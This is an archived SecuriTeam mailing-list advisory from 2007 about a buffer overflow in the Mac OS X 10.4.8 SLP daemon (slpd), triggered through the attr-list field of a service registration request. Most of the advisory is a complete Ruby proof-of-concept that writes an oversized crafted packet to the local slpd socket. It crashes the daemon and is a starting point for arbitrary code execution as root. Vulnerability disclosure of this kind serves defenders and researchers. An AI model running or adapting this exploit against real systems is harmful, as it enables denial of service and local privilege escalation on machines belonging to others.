[EXPL] Mac OS X SLP Daemon Service Registration Buffer Overflow (PoC)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 18 Jan 2007 16:34:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mac OS X SLP Daemon Service Registration Buffer Overflow (PoC)
------------------------------------------------------------------------
SUMMARY
"The Service Location Protocol provides a scalable framework for the
discovery and selection of network services."
slpd is vulnerable to a buffer overflow condition when processing the
attr-list field of a registration request, leading to an exploitable
denial of service condition and potential arbitrary execution. It would
allow unprivileged local (and possibly remote) users to execute arbitrary
code under root privileges.
DETAILS
Vulnerable Systems:
* Mac OS X version 10.4.8.
Exploit:
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at]
digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.
require 'socket'
target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket = UNIXSocket.open(target_path)
payload = ("\x58" * 506)
payload << [0xdeadbeef].pack("V") # ...it expects a valid mem.
address (ex. 0xbffff398)
stream = "\x01" + # SrvRqst = 1
"\x00\x13" + # Length of remaining
fields? (up to attr-list)
"\x04\x00\x00\x00\x00\x00\x00" +
"\x00\x02\x00\x00" + # length of scope-list
string
"\x78\x78" + # <scope-list>
"\xff\x03\x00\x00" + # length of attr-list string
0x3ff = 1023 in hex.
(payload) # <attr-list>
slp_socket.write stream
slp_socket.close
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.milw0rm.com/exploits/3151>
http://www.milw0rm.com/exploits/3151
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] ChainKey Java Code Protection Bypass Issue
- Next by Date: [NT] Microsoft Help Workshop CNT Contents Files Buffer Overflow
- Previous by thread: [NEWS] ChainKey Java Code Protection Bypass Issue
- Next by thread: [NT] Microsoft Help Workshop CNT Contents Files Buffer Overflow
- Index(es):
Relevant Pages
|
|
